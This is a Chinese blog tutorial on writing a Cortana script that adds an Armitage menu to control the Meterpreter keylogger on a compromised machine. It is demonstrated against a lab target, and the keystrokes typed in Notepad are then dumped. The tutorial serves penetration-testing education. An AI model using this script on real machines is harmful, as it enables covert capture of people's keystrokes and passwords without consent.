转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86682971

通过Meterpreter会话成功连接到目标计算机之后,Cortana还可以为我们提供构建自定义菜单的功能。这里,我们创建一个监听目标主机键盘操作的自定义菜单

首先创建一个脚本menu.cna,内容如下:

popup meterpreter_bottom{
	menu "&My Key Logger"{
		item "&Start Key Logger"{
			m_cmd($1, "keyscan_start");
		}
		item "&Stop Key Logger"{
			m_cmd($1, "keyscan_stop");
		}
		item "&Show Keylogs"{
			m_cmd($1, "keyscan_dump");
		}
		on meterpreter_keyscan_start{
			println(" $3 ");
		}
		on meterpreter_keyscan_stop{
			println(" $3 ");
		}
		on meterpreter_keyscan_dump{
			println(" $3 ");
		}
	}
}

这段代码实现了在Meterpreter子菜单中创建一个新的弹出菜单项。不过只有成功渗透了目标计算机并取得了一个Meterpreter命令行时,这个弹出菜单才是可用的

关键字popup表示要创建一个弹出式菜单项,而函数meterpreter_bottom表示当用户在目标计算机图标上单击鼠标右键并选中Meterpreter时,这个菜单项就会出现。关键字item制定了菜单中的各个选项。,命令m_cmd会根据它们对应编号的会话将命令发送给Metasploit。

这段代码有三个选项:Start Key Logger、Stop Key Logger和Show Keylogs。分别用来开启键盘监听器、停止键盘监听器以及显示当前记录中的键盘监听数据。我们还声明了三个用来处理发送给Meterpreter的命令输出函数。

在Cortana中载入这个脚本,成功渗透目标计算机,然后在目标计算机的图表上单击鼠标右键,会弹出如下的菜单:

Armitage之——使用Cortana创建自定义菜单_渗透

这里,我们单击Start Key Logger,在Cortana命令行输出了信息:

Armitage之——使用Cortana创建自定义菜单_渗透_02

此时,我们到靶机上利用记事本随便输入几个字符

Armitage之——使用Cortana创建自定义菜单_渗透_03

接着我们在Kali上单击Show Keylogs

Armitage之——使用Cortana创建自定义菜单_Armitage_04

效果如下:

Armitage之——使用Cortana创建自定义菜单_Armitage_05

可以看到在Cortana命令行输出了我们在靶机上输入的键盘操作。

接着,我们单击Stop Key Logger停止键盘监听

Armitage之——使用Cortana创建自定义菜单_渗透_06

效果如下:

Armitage之——使用Cortana创建自定义菜单_渗透_07